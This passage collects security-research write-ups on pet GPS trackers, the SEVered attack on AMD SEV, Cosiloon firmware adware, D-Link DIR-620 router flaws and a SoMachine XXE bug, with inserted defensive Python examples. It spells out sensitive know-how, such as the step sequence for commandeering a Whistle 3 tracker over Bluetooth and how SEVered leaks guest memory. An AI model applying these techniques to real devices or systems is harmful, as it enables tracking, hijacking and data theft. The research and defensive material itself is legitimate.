Two TrackR devices featured in our study: Bravo and Pixel. These “trinkets” differ from the previous devices in that their tracking range (if indeed they are intended to track pets) is limited to 100 meters: unlike the other models, they have no GPS module or SIM card, and the only link to them is via Bluetooth LE. Their main purpose is to locate keys, remote controls, etc. around the apartment. However, the developers have equipped the devices with an option that lets them partially track the movements of something: the tracker’s location can be transmitted “via” the smartphones of other TrackR app users. If the app is running on a smartphone, it will send the service data about all “trinkets” detected nearby, together with the smartphone’s coordinates. Therein lies the first defect: anyone can sign into the mobile app and send fake coordinates.

We managed to identify a few more problems, but as it turned out, most of them had already been discovered by our colleagues at Rapid7. Although their research was published more than a year ago, some vulnerabilities had yet to be fixed at the time of penning this article.

For instance, the devices have no authentication when connecting via Bluetooth LE, which means they are open to intruders. An attacker could easily connect and turn on the audio signal, for example, simply by changing the value of one characteristic. This could let an attacker find the animal before its owner does, or run down the tracker battery.

Structure of TrackR services and attributes

Besides, the app for Android does not verify server certificates, meaning that an MITM attack could lead to the interception of the password, authentication token, user email address, and device coordinates.

TrackR Android app requests contain an authentication token

On the bright side, the app does not store the authentication token or password in its own folder, which is the proper way to guard against Trojans that use superuser rights to steal data.

Registered CVE:
CVE-2018-7040
CVE-2016-6541

Tractive
Unlike most devices we studied, this tracker does not communicate directly with the smartphone—only through its own servers. This approach is secure enough, but we detected some minor issues in the Android app. First, as in other cases, it does not verify the server certificate, which facilitates MITM attacks. What’s more, the app stores the authentication token in unencrypted form:


As well as pet movement data:


It should be noted that this data is not so easy to steal, since other apps cannot read it. But there are Trojans that can steal data from other apps by exploiting superuser rights.

Weenect WE301
This is another tracker that doesn’t interface with the owner’s smartphone directly, but transfers pet coordinates to the server via a built-in SIM card. We didn’t encounter any security issues with this tracker, but problems similar to those in Tractive were detected in the Android version of the app.

First, it does not prevent MITM attacks, allowing attackers to access the user’s account or intercept geoinformation. Second, authentication data is stored in the app folder in unencrypted form, exposing it to Trojans with superuser rights on the device.

Whistle 3
This is one of the most technically interesting trackers in the study. It can transfer GPS coordinates via its built-in SIM card, via Wi-Fi to its server (if the owner provides a Wi-Fi network password), or directly to the owner’s smartphone via BLE.

We looked at Wi-Fi first of all and found that the developers had taken care to secure the connection: The device transmits small portions of data over HTTPS (that is, in encrypted form).

Wi-Fi data transfer is secured using HTTPS

Next, we checked the BLE connection and found many security issues. The first is the lack of proper authentication. After connecting, the device waits for a certain sequence of actions to be performed, which could be described as pre-authentication. The sequence is so simple that a third party can easily reproduce it. All it takes is to connect to the device, switch two characteristics to WRITE_TYPE_NO_RESPONSE mode, request a change in the size of transmitted data (MTU), turn on notifications for one characteristic, and write a certain number to another characteristic.

Now the tracker is ready to receive and execute commands that do not contain a user ID, which means that anyone can send them. For example, it is possible to send an initiateSession command, and in response the device will send an unencrypted set of data, including the device coordinates. What’s more, if this command is continuously transmitted, the gadget will not send location data via the SIM card, since it will assume that such data has already been received “directly.” Thus, it is possible to “hide” the tracker from its owner.
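The pre-authentication recommended in the Technologies section above is what the Whistle 3 sequence just described, and the Nuzzle behaviour earlier, lack: the sequence contains nothing secret, and an unauthenticated read still counts as “delivered” for the purpose of suppressing the cellular upload. The block below is an added simulation written for this page (not any vendor’s firmware or Kaspersky’s code) of a tracker peripheral that gates its characteristics behind a challenge-response. `TrackerPeripheral`, `server_sign`, `SERVER_KEY`, the MAC/nonce binding and the 5-second grace period are all assumptions of the example; the key stands in for one held on the vendor’s server rather than in the app.

```python
import hashlib
import hmac
import os
import time

# Constructed demo key. The point of the design is that this key lives on the
# vendor's server, not in the mobile app, so a peer that merely connects over
# BLE cannot compute a valid response (assumption made for this example).
SERVER_KEY = b"demo-server-side-key-not-for-production"
AUTH_GRACE_SECONDS = 5.0


def _mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def server_sign(nonce: bytes, peer_mac: str, key: bytes = SERVER_KEY) -> bytes:
    """What the vendor server returns to a legitimate app: a response bound to
    both the tracker's nonce and the phone's MAC address."""
    return hmac.new(key, nonce + _mac_bytes(peer_mac), hashlib.sha256).digest()


class TrackerPeripheral:
    """Simulated BLE tracker (hypothetical): every characteristic is gated
    behind a challenge-response, and peers that do not authenticate are dropped."""

    def __init__(self, key: bytes = SERVER_KEY, clock=time.monotonic):
        self._key = key
        self._clock = clock
        self.sessions = {}                                  # peer MAC -> session state
        self.telemetry = {"lat": 52.3731, "lon": 4.8926}    # constructed sample fix
        self.delivered_over_ble = False

    def connect(self, peer_mac: str) -> bytes:
        """Any peer may connect and read the challenge; nothing else is exposed."""
        nonce = os.urandom(16)
        self.sessions[peer_mac] = {"nonce": nonce, "authed": False,
                                   "since": self._clock()}
        return nonce

    def authenticate(self, peer_mac: str, response: bytes) -> bool:
        session = self.sessions.get(peer_mac)
        if session is None:
            return False
        expected = server_sign(session["nonce"], peer_mac, self._key)
        if hmac.compare_digest(expected, response):
            session["authed"] = True
            return True
        self.disconnect(peer_mac)          # wrong answer: break the link at once
        return False

    def read_telemetry(self, peer_mac: str) -> dict:
        """The telemetry characteristic, readable only after authentication."""
        session = self.sessions.get(peer_mac)
        if session is None or not session["authed"]:
            raise PermissionError("characteristic not readable before authentication")
        self.delivered_over_ble = True     # only an authenticated read counts as delivery
        return dict(self.telemetry)

    def tick(self) -> None:
        """Drop peers that did not authenticate within the grace period."""
        now = self._clock()
        for mac, session in list(self.sessions.items()):
            if not session["authed"] and now - session["since"] > AUTH_GRACE_SECONDS:
                self.disconnect(mac)

    def disconnect(self, peer_mac: str) -> None:
        self.sessions.pop(peer_mac, None)

    def should_upload_over_cellular(self) -> bool:
        """Skip the SIM upload only if an authenticated peer already got the fix."""
        return not self.delivered_over_ble


if __name__ == "__main__":
    dev = TrackerPeripheral()
    phone = "AA:BB:CC:DD:EE:02"
    nonce = dev.connect(phone)
    print("authenticated:", dev.authenticate(phone, server_sign(nonce, phone)))
    print("telemetry:", dev.read_telemetry(phone))
    print("upload over cellular:", dev.should_upload_over_cellular())
```

Two design choices matter here. The response is bound to the connecting MAC address, so a response captured from one phone is useless from another (the behaviour observed on Link AKC), and `delivered_over_ble` is set only by an authenticated read, so an unauthenticated connection can never stop the cellular upload and “hide” the tracker.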

There is one more problem: the tracker transmits data to the server without any authentication. This means that anyone can spoof the tracker’s uploads and substitute their own coordinates.

The app transmits data received from the tracker via BLE

The Android app uses the HTTPS protocol (which is good), but does not verify the server certificate.

MITM attacks can intercept user data

Not only that, the smartphone app stores user data in unencrypted form in its own folder, exposing it to theft by a Trojan with superuser rights. However, authentication data is stored correctly.

Tracker coordinates from the app database

Note that the Android app writes data to logcat. As mentioned above, although only some system utilities or apps with superuser rights can read other apps’ logs, there is no need to write important data to the log at all.

The Android app can log user and pet data (activity, email address, name, owner’s phone number), as well as one of the used tokens
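The logging findings for Kippy Vita, Link AKC and Whistle 3 share one cause: request and response bodies are written to the log verbatim. As an added example written for this page (not any of the apps’ code), the block below shows a logging filter that scrubs tokens, password fields and e-mail addresses before a record reaches a handler, run over a few constructed log lines of the kind the article describes. The patterns, the sample lines and the `tracker.demo` logger name are assumptions of the example; on Android the same idea would be applied in the app’s logging wrapper rather than Python’s `logging` module.

```python
import logging
import re

# Patterns for the kinds of values the apps were found to log: bearer tokens,
# password/token fields in query strings or JSON, and e-mail addresses.
_PATTERNS = [
    (re.compile(r"(?i)(authorization\s*:\s*bearer\s+)([A-Za-z0-9._\-]+)"), r"\1[REDACTED]"),
    (re.compile(r'(?i)("?(?:password|token|access_token)"?\s*[:=]\s*"?)([^"&\s,}]+)'),
     r"\1[REDACTED]"),
    (re.compile(r"[A-Za-z0-9._%+\-]+@[A-Za-z0-9.\-]+\.[A-Za-z]{2,}"), "[EMAIL]"),
]


def scrub(text: str) -> str:
    """Apply every redaction pattern to one log message."""
    for pattern, replacement in _PATTERNS:
        text = pattern.sub(replacement, text)
    return text


class RedactingFilter(logging.Filter):
    """Rewrites the record in place so no handler ever sees the raw message."""

    def filter(self, record: logging.LogRecord) -> bool:
        record.msg = scrub(record.getMessage())
        record.args = ()
        return True


class _ListHandler(logging.Handler):
    """Collects formatted records so the result can be inspected."""

    def __init__(self) -> None:
        super().__init__()
        self.lines = []

    def emit(self, record: logging.LogRecord) -> None:
        self.lines.append(self.format(record))


# Constructed sample lines resembling what the apps wrote to logcat.
SAMPLE_LINES = [
    "POST /api/login email=alice@example.com&password=Hunter2!",
    "Authorization: Bearer eyJhbGciOi.abc.def",
    '{"user":"bob@example.org","access_token":"t0k3n-value","lat":52.37}',
]


def demo_logs() -> list:
    """Log the sample lines through the filter and return what was recorded."""
    logger = logging.getLogger("tracker.demo")
    logger.handlers.clear()
    logger.propagate = False
    logger.setLevel(logging.DEBUG)
    handler = _ListHandler()
    handler.setFormatter(logging.Formatter("%(levelname)s %(message)s"))
    logger.addHandler(handler)
    logger.addFilter(RedactingFilter())
    for line in SAMPLE_LINES:
        logger.debug(line)
    return handler.lines


if __name__ == "__main__":
    for line in demo_logs():
        print(line)
```

The filter sits on the logger rather than on a handler, so it also covers handlers added later (for example a crash reporter); it is a safety net, and the better fix, as the article says, is not to log request bodies and tokens in the first place.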

Registered CVE:
CVE-2018-8760
CVE-2018-8757
CVE-2018-8759
CVE-2018-9917

Conclusions
GPS trackers have long been applied successfully in many areas, but using them to track the location of pets is a step beyond their traditional scope of application: for this, they need to be upgraded with new “user communication interfaces” and “trained” to work with cloud services, etc. If security is not properly addressed, user data becomes accessible to intruders, endangering both users and pets.

Research results: four trackers use Bluetooth LE technology to communicate with the owner’s smartphone, but only one does so correctly. The rest can receive and execute commands from anyone. Moreover, they can be disabled or hidden from the owner—all that’s required is proximity to the tracker.

Just one of the tested Android apps verifies the certificate of its server itself, without relying solely on the system. As a result, the rest are vulnerable to MITM attacks—intruders can intercept transmitted data by “persuading” victims to install their certificate.


Experts show how to defeat AMD’s Secure Encrypted Virtualization
26.5.2018 securityaffairs Safety

German researchers devised a method, dubbed SEVered, to defeat the Secure Encrypted Virtualization (SEV) security mechanism implemented in AMD Epyc server chips to automatically encrypt virtual machines in memory.
The attack could allow them to exfiltrate data in plaintext from an encrypted guest via a hijacked hypervisor and simple HTTP requests to a web server running in a second guest on the same machine.

The Secure Encrypted Virtualization feature encrypts and decrypts virtual machine memory on the fly while it is stored in RAM, to protect VMs from snooping.

Thanks to Secure Encrypted Virtualization, a hijacked hypervisor, kernel, driver, or malware should not be able to snoop on a protected virtual machine.

The team of Fraunhofer AISEC researchers, composed of Mathias Morbitzer, Manuel Huber, Julian Horsch and Sascha Wessel, demonstrated that the SEVered technique could bypass Secure Encrypted Virtualization protections and copy information from a virtual machine.

“We present the design and implementation of SEVered, an attack from a malicious hypervisor capable of extracting the full contents of main memory in plaintext from SEV-encrypted virtual machines. SEVered neither requires physical access nor colluding virtual machines, but only relies on a remote communication service, such as a web server, running in the targeted virtual machine.” reads the research paper published by the researchers.

“We verify the effectiveness of SEVered on a recent AMD SEV-enabled server platform running different services, such as web or SSH servers, in encrypted virtual machines”

An attacker at the host level can alter a guest’s physical memory mappings through standard page tables, causing the failure of the Secure Encrypted Virtualization mechanism in isolating and scrambling parts of the VM in RAM.

“We base SEVered on the observation that the page-wise encryption of main memory lacks integrity protection. While the VM’s Guest Virtual Address (GVA) to Guest Physical Address (GPA) translation is controlled by the VM itself and opaque to the HV, the HV remains responsible for the Second Level Address Translation (SLAT), meaning that it maintains the VM’s GPA to Host Physical Address (HPA) mapping in main memory.” continues the paper.

“This enables us to change the memory layout of the VM in the HV. We use this capability to trick a service in the VM, such as a web server, into returning arbitrary pages of the VM in plaintext upon the request of a resource from outside”

Secure Encrypted Virtualization amd

The researchers set up a test environment running an AMD Epyc 7251 processor with SEV enabled and Debian GNU/Linux installed, running an Apache web server and an OpenSSH server in two separate virtual machines.

By modifying the system’s Kernel-based Virtual Machine (KVM) hypervisor, the experts demonstrated that it is possible to observe when software within a guest accesses physical RAM.

Then the researchers sent a large number of requests to one of the services, for example fetching an HTML page from Apache. In this scenario, the hypervisor was able to see which pages of physical memory were being used to hold the file; by switching the page mappings, an encrypted page belonging to another virtual machine was made to back the page Apache uses to send the requested web page, so Apache sent the automatically decrypted memory page of the other VM instead.

With this trick, the attacker could force the Apache service into leaking data from another guest.

“With the knowledge about the location of the resource, we were able to reliably extract the entire memory of the target VM on our prototype implementation,” continues the paper.

“The resource was always sticky over the whole process. While preserving the VM’s stability at all times, the extraction of its entire 2 GB also worked under the noise model introduced for the identification phase.”

The experts demonstrated the effectiveness of the SEVered attack in extracting the entire memory of an SEV-protected VM.

The experts also analyzed countermeasures; the best one consists of providing full integrity and freshness protection of guest pages in addition to the encryption.

“The best solution seems to be to provide a full-featured integrity and freshness protection of guest-pages additional to the encryption, as realized in Intel SGX. However, this likely comes with a high silicon cost to protect full VMs compared to SGX enclaves,” the experts concluded.

“A low-cost efficient solution could be to securely combine the hash of the page’s content with the guest-assigned GPA.”
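The root cause the paper names is that the page-wise encryption carries no integrity protection, so the hypervisor can re-map a guest physical address (GPA) onto a different host page and the guest decrypts whatever now sits there. The block below is an added toy model written for this page (not the researchers’ code or AMD’s design) of the low-cost countermeasure quoted above: each page carries an authentication tag, and with `bind_gpa=True` the tag also covers the GPA, so a page that the hypervisor moves to a different GPA no longer verifies. `GuestMemory`, `hypervisor_remap` and `remap_demo` are hypothetical names, and an HMAC under a per-VM key stands in for whatever the memory controller would compute.

```python
import hashlib
import hmac
import os


class IntegrityError(Exception):
    pass


class GuestMemory:
    """Toy model of SEV-style page protection. Each guest page carries a tag;
    with bind_gpa=True the tag also covers the guest physical address (GPA)."""

    def __init__(self, key: bytes, bind_gpa: bool):
        self._key = key            # stands in for the per-VM key the hypervisor never sees
        self.bind_gpa = bind_gpa
        self.pages = {}            # GPA -> (page content, tag)

    def _tag(self, gpa: int, content: bytes) -> bytes:
        prefix = gpa.to_bytes(8, "little") if self.bind_gpa else b""
        return hmac.new(self._key, prefix + content, hashlib.sha256).digest()

    def write(self, gpa: int, content: bytes) -> None:
        self.pages[gpa] = (content, self._tag(gpa, content))

    def read(self, gpa: int) -> bytes:
        """A guest read: the tag is checked against the GPA the guest asked for."""
        content, tag = self.pages[gpa]
        if not hmac.compare_digest(tag, self._tag(gpa, content)):
            raise IntegrityError(f"page at GPA {gpa:#x} failed verification")
        return content


def hypervisor_remap(mem: GuestMemory, victim_gpa: int, resource_gpa: int) -> None:
    """Model of the SLAT change the paper describes: the hypervisor makes the
    GPA of a served resource point at the host page that holds another page."""
    mem.pages[resource_gpa] = mem.pages[victim_gpa]


def remap_demo(bind_gpa: bool) -> str:
    """Return what the service would serve after the remap: the re-mapped page,
    or 'blocked' when the GPA-bound tag no longer verifies."""
    mem = GuestMemory(os.urandom(32), bind_gpa)
    # Constructed pages: one the web server legitimately serves, one it must not.
    mem.write(0x1000, b"<html>public resource</html>".ljust(64, b"\x00"))
    mem.write(0x2000, b"SECRET: private key material".ljust(64, b"\x00"))
    hypervisor_remap(mem, victim_gpa=0x2000, resource_gpa=0x1000)
    try:
        return mem.read(0x1000).rstrip(b"\x00").decode()
    except IntegrityError:
        return "blocked"


if __name__ == "__main__":
    print("content-only tag :", remap_demo(bind_gpa=False))
    print("GPA-bound tag    :", remap_demo(bind_gpa=True))
```

With a content-only tag the moved page still verifies, which is why encryption alone does not help: the data is genuine, it is just being decrypted at the wrong address. Binding the tag to the GPA is what turns the remap into a detectable fault; freshness protection (a counter in the tag) would additionally stop replay of an older copy of the same page at the same GPA.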


Pre-installed malware found in 141 low-cost Android devices in over 90 countries
26.5.2018 securityaffairs Android

Researchers from the antivirus firm Avast are investigating the discovery of pre-installed malware in 141 low-cost Android devices in over 90 countries.
Security experts from the antivirus firm Avast have discovered a new case of pre-installed malware on low-cost Android devices: crooks injected the malicious code into the firmware of 141 models.

The operation is linked to the discovery made in December 2016 by researchers at antivirus firm Dr. Web, when the experts reported a crime gang that had compromised the supply-chain of several mobile carriers, infecting mobile devices with malware.

In 2016, the malware infected the firmware of at least 26 low-cost Android smartphone and tablet models. The firmware of a large number of popular Android devices running on the MediaTek platform was compromised with at least two types of downloader Trojans.
Both malware samples found on the low-cost Android mobile devices, detected as Android.DownLoader.473.origin and Android.Sprovider.7, were able to collect users’ data, display advertisements on top of running applications and download unwanted apps. These low-cost Android smartphones and tablets were mostly marketed in Russia.

Back in the present, Avast experts believe the same criminal gang is still active and is continuing the same operation by compromising the firmware of many other devices by injecting a malware dubbed Cosiloon.

The researchers discovered infected devices in over 90 countries, and all of them use a Mediatek chipset, but MediaTek is not the root cause of the infections because only the firmware for some devices from an affected smartphone model is tainted with malware. This means that attackers did not compromise the MediaTek firmware components.

“The adware we analyzed has previously been described by Dr. Web and goes by the name “Cosiloon.” As can be seen in the screenshots below, the adware creates an overlay to display an ad over a webpage within the users’ browser. The adware has been active for at least three years, and is difficult to remove as it is installed on the firmware level and uses strong obfuscation.” reads the analysis published by Avast.

“Thousands of users are affected, and in the past month alone we have seen the latest version of the adware on around 18,000 devices belonging to Avast users located in more than 100 countries including Russia, Italy, Germany, the UK, as well as some users in the U.S.”

Avast published a list of over 140 Android smartphones and tablets on which it says it found the group’s malware—which they named Cosiloon.

The Cosiloon malware is the same one that Dr. Web spotted in 2015, and according to the experts it hasn’t received any updates.

The malware is composed of two separate APKs, the dropper and the payload. In the older versions of the malware, the experts noticed a separate adware app pre-installed in the /system partition; in the most recent variants the researchers found a new dropped payload.

“A second variant of the dropper is a bit more interesting. The code is pretty much the same as the first variant, but it is not a separate system application. The code is embedded in SystemUI.apk, an integral part of the Android OS. This makes the dropper pretty much impossible to remove by the user.” continues the analysis.

The dropper runs from the “/system” folder with full root privileges; it downloads an XML file from a remote server and then installs other malicious apps.

In almost every infection, the malicious code was used to display ads on top of mobile apps or the Android OS interface.

Cosiloon pre-installed malware

The experts noticed the pre-installed malware doesn’t drop any malicious app if the device language is set to Chinese, when the device’s public IP address is also from a Chinese IP range, and when the number of installed apps is below three (a circumstance that could indicate that the malware is running in a test environment).

Avast researchers confirmed that the infection point is still a mystery due to the large number of vendors involved; detecting the dropper is also very complicated, as explained in the analysis.

“Detecting the dropper is further complicated by the fact that it is a system app, part of the devices’ read-only firmware, which is integrated in the device shipped from the factory.” continues the analysis.

“Also, it is likely odexed in most firmwares, meaning the app’s code was removed from the original APK file, optimized and stored separately during the firmware’s build process. As a result, cybersecurity firms are likely missing many of the dropper samples and have to rely on the payload for detection and statistics.”

Experts believe the attackers are opportunistic and target the supply chain somewhat at random, whenever they get the chance to compromise a vendor’s firmware.

The control server was up until April 2018; the crooks produced new payloads over time while several manufacturers kept shipping new devices with the pre-installed dropper.

The experts attempted to disable Cosiloon’s C&C server by sending takedown requests to the domain registrar and server providers. The provider ZenLayer quickly shut down the server, but the crooks moved their activities to another provider that did not respond to Avast’s request.

“Avast Mobile Security can detect and uninstall the payload, but it cannot acquire the permissions required to disable the dropper, so Google Play Protect has to do the heavy lifting.” concluded Avast.

“If your device is infected, it should automatically disable both the dropper and the payload. We know this works because we have observed a drop in the number of devices infected by new payload versions after Play Protect started detecting Cosiloon.”

Further details, including IoCs for the Cosiloon pre-installed malware, are reported in the Avast analysis.


Backdoors in D-Link’s backyard

26.5.2018 Kaspersky Vulnerebility
Multiple vulnerabilities in D-Link DIR-620 router
“If you want to change the world, start with yourself.” In the case of security research this can be rephrased to: “If you want to make the world safer, start with the smart things in your home.” Or, to be more specific, start with your router – the core of any home network as well as an interesting research object. And that router you got from your ISP as part of your internet contract is even more interesting when it comes to research.

The impact of vulnerabilities
Note: the following information about vulnerabilities has been submitted to the respective stakeholders (D-Link, ISP provider, Mitre) and we are publishing this information in accordance with vulnerability disclosure policy.

The following advisory describes four vulnerabilities and hardcoded accounts in D-Link DIR-620 firmware. The firmware runs on various D-Link routers that one of the biggest ISPs in Russia delivers to its customers (this conclusion is based on the fact that the router is provided as part of the standard customer contract and the hardcoded credentials contain the name of the ISP in the login string). This is probably why this particular model of router is so popular in Russia and CIS countries (most home routers are located behind their ISP’s NAT, which is why these routers don’t appear in the statistics).

Geography of vulnerable routers


The object of research
The latest versions of the firmware have hardcoded default credentials that can be exploited by an unauthenticated attacker to gain privileged access to the firmware and to extract sensitive data, e.g., configuration files with plain-text passwords. The vulnerable web interface allows an unauthenticated attacker to run arbitrary JavaScript code in the user environment and run arbitrary commands in the router’s operating system (OS).

Example of firmware interface (probably customized for ISP purposes)

These issues were originally identified in firmware version 1.0.37. Some of the discovered vulnerabilities were also identified in other versions of the firmware:

1.3.1
1.3.3
1.4.0
2.0.22
Technical details
Weakness in user data validation (reflected cross-site scripting) (CVE-2018-6212)
The one input field that allows user input – Quick search – inspired me to look deeper into the firmware: the field facilitates an XSS attack vector. A reflected cross-site scripting (XSS) attack is possible as a result of missing filtering of special characters in this field and incorrect processing of the XMLHttpRequest object (this vulnerability was discovered in v.1.3.3, but is also present in other versions).

Demonstration of a reflected XSS

Vulnerability metrics:

CVSS v3 Base Score: 6.1

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Hardcoded default credentials for web dashboard (CVE-2018-6213)
I downloaded the firmware and extracted the filesystem. Most Unix-based firmware includes BusyBox – software that provides several stripped-down Unix tools for embedded systems. This makes it easy to identify the proprietary binary files, i.e., all binaries that are not part of the original BusyBox toolset and were probably modified for ISP purposes.

I extracted strings from the web server binary (httpd), and my attention was immediately drawn to the “anonymous” string. I looked at the function where this string was being used.

The code responsible for checking the user’s credentials contains ‘hardcoded credentials’

These privileged credentials cannot be changed by the administrator. Privileged access to the dashboard allows an attacker to extract sensitive data.
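The step described above, pulling printable strings out of the proprietary httpd binary and noticing a suspicious login string, is the routine first pass of a firmware audit. The block below is an added example written for this page (not the author’s tooling) that does the same over a constructed stand-in for such a binary: it extracts printable ASCII runs with their offsets, flags those that match credential-like hints, and also reports their printable neighbours, since a hardcoded login usually sits a few bytes from its password. `SAMPLE_BINARY`, the hint list and the 64-byte window are assumptions of the example; the flagged strings in it are placeholders, not the router’s real credentials.

```python
import re

# Substrings that, in a web-server or login binary, deserve a closer look.
CREDENTIAL_HINTS = ("anonymous", "admin", "root", "passw", "login", "telnet", "user")


def extract_strings(blob: bytes, min_len: int = 4):
    """Like the Unix 'strings' tool: runs of printable ASCII, with their offsets."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [(match.start(), match.group().decode("ascii")) for match in pattern.finditer(blob)]


def flag_credential_candidates(strings, window: int = 64):
    """Strings matching a credential hint, plus every printable string within
    `window` bytes of one, sorted by offset."""
    hits = [(offset, s) for offset, s in strings
            if any(hint in s.lower() for hint in CREDENTIAL_HINTS)]
    flagged = set()
    for hit_offset, _ in hits:
        for offset, s in strings:
            if abs(offset - hit_offset) <= window:
                flagged.add((offset, s))
    return sorted(flagged)


# Constructed stand-in for an httpd binary: an ELF-like header, padding, a few
# ordinary strings, and a hardcoded account next to a placeholder password.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 16
    + b"Content-Type: text/html\x00"
    + b"GET\x00POST\x00" + b"\x00" * 200
    + b"anonymous\x00"
    + b"PLACEHOLDER-PASSWORD\x00" + b"\x00" * 100
    + b"index.cgi\x00"
)


def audit(blob: bytes = SAMPLE_BINARY):
    """Run the two passes and return the flagged (offset, string) pairs."""
    return flag_credential_candidates(extract_strings(blob))


if __name__ == "__main__":
    for offset, s in audit():
        print(f"{offset:#08x}  {s}")
```

On the sample this yields `anonymous` and the placeholder password beside it, while `Content-Type: text/html`, `POST` and `index.cgi` are left out. On a real image the hit list is a starting point for opening the flagged offsets in a disassembler, as the author did for the function that consumed the “anonymous” string.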

Vulnerability metrics:

CVSS v3 Base Score: 6.5

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

OS command injection (CVE-2018-6211)
An OS command injection vulnerability is possible as a result of incorrect processing of the user’s input data in the following parameter (the vulnerability was discovered in v.1.0.3):

/index.cgi?<…>&res_buf

Example of request with OS command injection

Vulnerability metrics:

CVSS v3 Base Score: 9.1

Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Hardcoded default credentials for Telnet (CVE-2018-6210)
Using the vulnerability above, an attacker can extract Telnet credentials. The credentials were discovered in firmware v1.0.3. For example, by using the default credentials for Telnet an attacker can get administrative access to a router (the fragment of “etc/passwd”).

Demonstration of OS command injection vulnerability

Vulnerability metrics:

CVSS v3 Base Score: 10.0

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

How to fix it
We received an official response from the vendor stating that this router model was no longer supported. In this case, we provide the following recommendations:

Restrict any access to the web dashboard using a whitelist of trusted IPs
Restrict any access to Telnet
Regularly change your router admin username and password
Advisory Status
01/15/2018 – reported to vendor
01/15/2018 – reported to ISP
01/24/2018 – received a response from ISP
02/06/2018 – received a response from vendor. Official statement: this router model is no longer supported by the vendor, so the vendor will only patch vulnerabilities if the ISP sends a request to do so.


CVE-2018-7783 flaw in Schneider SoMachine Basic can be exploited to read arbitrary files on the targeted system
26.5.2018 securityaffairs Vulnerebility

Schneider Electric issued a security update for its EcoStruxure Machine Expert (aka SoMachine Basic) product that addresses a high severity vulnerability, tracked as CVE-2018-7783, that could be exploited by a remote and unauthenticated attacker to obtain sensitive data.

“SoMachine Basic suffers from an XML External Entity (XXE) vulnerability using the DTD parameter entities technique resulting in disclosure and retrieval of arbitrary data on the affected node via out-of-band (OOB) attack.” reads the security advisory published by Schneider Electric.

“The vulnerability is triggered when input passed to the xml parser is not sanitized while parsing the xml project/template file”

EcoStruxure Machine Expert is a tool for programming Schneider Modicon M221 programmable logic controllers (PLCs).

The XML external entity (XXE) vulnerability was discovered by Gjoko Krstic, a researcher at the industrial cybersecurity firm Applied Risk.

According to the expert, the flaw affects SoMachine Basic 1.6.0 build 61653, 1.5.5 SP1 build 60148, and likely earlier versions. It could be exploited by an attacker to launch an out-of-band (OOB) attack.

In order to exploit the flaw, the attacker has to trick a victim into opening a specially crafted SoMachine Basic project or template file.

Krstic also discovered that in certain circumstances attackers can trigger the vulnerability to achieve arbitrary code execution or to cause a denial-of-service (DoS) condition.
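The advisory’s root cause, “input passed to the xml parser is not sanitized while parsing the xml project/template file”, has a standard fix: a parser that handles untrusted project files must refuse any DOCTYPE or entity declaration outright, since a legitimate project file has no reason to carry one. The block below is an added example written for this page (not Schneider’s code) of that check using only the standard library: a first pass with a bare expat parser aborts at the first DOCTYPE or entity declaration, and only a file that passes is handed to ElementTree. The `<project>` layout, the `M221-demo` controller name and the sample files are constructed and do not reflect the real SoMachine Basic format.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class UnsafeProjectFile(ValueError):
    """Raised when a project/template file carries a DTD or entity declaration."""


def reject_dtd(data: bytes) -> None:
    """First pass with a bare expat parser: refuse the file as soon as a DOCTYPE
    or any entity declaration appears, before any content is processed."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeProjectFile(f"DOCTYPE '{name}' is not allowed in project files")

    def on_entity(*_args):
        raise UnsafeProjectFile("entity declarations are not allowed in project files")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(data, True)


def load_project(data: bytes) -> dict:
    """Parse a project file only after the DTD check has passed."""
    reject_dtd(data)
    root = ET.fromstring(data)
    return {
        "name": root.get("name"),
        "controller": root.findtext("controller"),
        "pou_count": len(root.findall("./pous/pou")),
    }


# Constructed sample files (hypothetical layout, not the real SoMachine format).
BENIGN_PROJECT = b"""<?xml version="1.0"?>
<project name="conveyor">
  <controller>M221-demo</controller>
  <pous><pou name="main"/><pou name="alarm"/></pous>
</project>"""

# The same project with an external DTD reference, which a benign file never needs.
DTD_PROJECT = b"""<?xml version="1.0"?>
<!DOCTYPE project SYSTEM "http://example.invalid/project.dtd">
<project name="conveyor"><controller>M221-demo</controller></project>"""


if __name__ == "__main__":
    print(load_project(BENIGN_PROJECT))
    try:
        load_project(DTD_PROJECT)
    except UnsafeProjectFile as exc:
        print("rejected:", exc)
```

Rejecting at the DOCTYPE rather than trying to sanitize entity content is the important choice: the parameter-entity technique named in the advisory lives entirely inside the DTD, so a file with no DTD at all has no place to carry it.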

Schneider Electric addressed the vulnerability with the release of SoMachine Basic v1.6 SP1.

SoMachine Basic Schneider Electric

In early May, researchers at Tenable disclosed technical details and PoC code for a critical remote code execution vulnerability affecting Schneider Electric InduSoft Web Studio and InTouch Machine Edition products.

A few days ago, Schneider Electric published a security advisory to warn customers of multiple vulnerabilities in the Flexera FlexNet Publisher component used in the Schneider Electric Floating License Manager software in PlantStruxure PES.

One week ago, Schneider published another advisory to inform customers that these flaws also impact PlantStruxure PES.


Email Leakage - An Overlooked Backdoor to GDPR Failure
25.5.2018 securityweek Privacy   

On May 25, 2018, two years after it was adopted by the European Union, the General Data Protection Regulation (GDPR) came into force. For two years companies have been bombarded with offers for GDPR solutions from security firms; and publications have been bombarded with surveys claiming that only n% of firms are ready or even understand GDPR.

In truth, however, the 'data protection' element in GDPR is little different from pre-existing European laws. The GDPR changes come in the way user data is gathered, stored, processed, and made accessible to users; in breach disclosure; and in the severity of non-compliance fines.

That said, companies can learn from last year's data protection non-compliance incidents to gain insight into next year's potential GDPR non-compliance fines. One source is the statistics available from the Information Commissioner's Office (ICO -- the UK data protection regulator).

The ICO's latest 'Data security incident trends' report was published on 14 May 2018. During Q4, the ICO levied just a single fine: £400,000 on Carphone Warehouse Ltd "after serious failures put customer data at risk." There were, however, a total of 957 reported data security incidents. The ICO defines these as "a major concern for those affected and a key area of action for the ICO."

